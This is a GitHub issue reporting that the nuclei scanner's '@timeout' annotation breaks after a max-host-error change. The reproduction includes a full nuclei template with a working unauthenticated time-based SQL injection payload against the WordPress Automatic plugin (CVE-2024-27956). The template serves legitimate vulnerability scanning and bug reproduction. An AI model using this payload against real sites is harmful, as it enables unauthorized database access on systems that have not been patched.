### ISSUE TITLE
timeout not working in templates

### ISSUE THREAD

**Issue by tarunKoyalwar** [projectdiscovery/nuclei#5137]
### Nuclei version:

main | dev

### Current Behavior:

- templates that use `timeout` request annotation fail because of recent change in `-mhe` 
- see https://github.com/projectdiscovery/nuclei/pull/5099

>[!NOTE]
> This is directly related with max-host-error , so we need to make sure that we ignore `timeout` based templates from mhe since these are not unresponsive errors but are caused by exploit

### Proposed Solution
- start with  adding a cause for timeouts (https://github.com/projectdiscovery/nuclei/pull/5096#issuecomment-2075878469)
- identify and categorize errors for mhe 
- fix timeout not working in templates

### Steps To Reproduce:

```yaml
id: CVE-2024-27956

info:
  name: WordPress Automatic Plugin <= 3.92.0 - SQL Injection
  author: DhiyaneshDK
  severity: critical
  description: |
    The Automatic plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 3.92.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
  remediation: |
    Update to version 3.92.1 or later.
  reference:
    - https://github.com/truonghuuphuc/CVE-2024-27956
    - https://patchstack.com/database/vulnerability/wp-automatic/wordpress-automatic-plugin-3-92-0-unauthenticated-arbitrary-sql-execution-vulnerability?_s_id=cve
    - https://github.com/NaInSec/CVE-LIST
    - https://github.com/nomi-sec/PoC-in-GitHub
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:L
    cvss-score: 9.9
    cve-id: CVE-2024-27956
    cwe-id: CWE-89
    epss-score: 0.00043
    epss-percentile: 0.08203
  metadata:
    verified: true
    max-request: 1
    publicwww-query: "wp-content/plugins/wp-automatic"
  tags: cve,cve2024,sqli,wordpress,wpscan,wp-automatic

http:
  - raw:
      - |
        @timeout: 20s
        POST /wp-content/plugins/wp-automatic/inc/csv.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        q=SELECT IF(1=1,sleep(5),sleep(0));&auth=%00&integ=dc9b923a00f0e449c3b401fb0d7e2fae

    matchers:
      - type: dsl
        dsl:
          - 'duration>=5'
          - 'status_code == 200'
          - 'contains(header, "application/csv")'
        condition: and
```
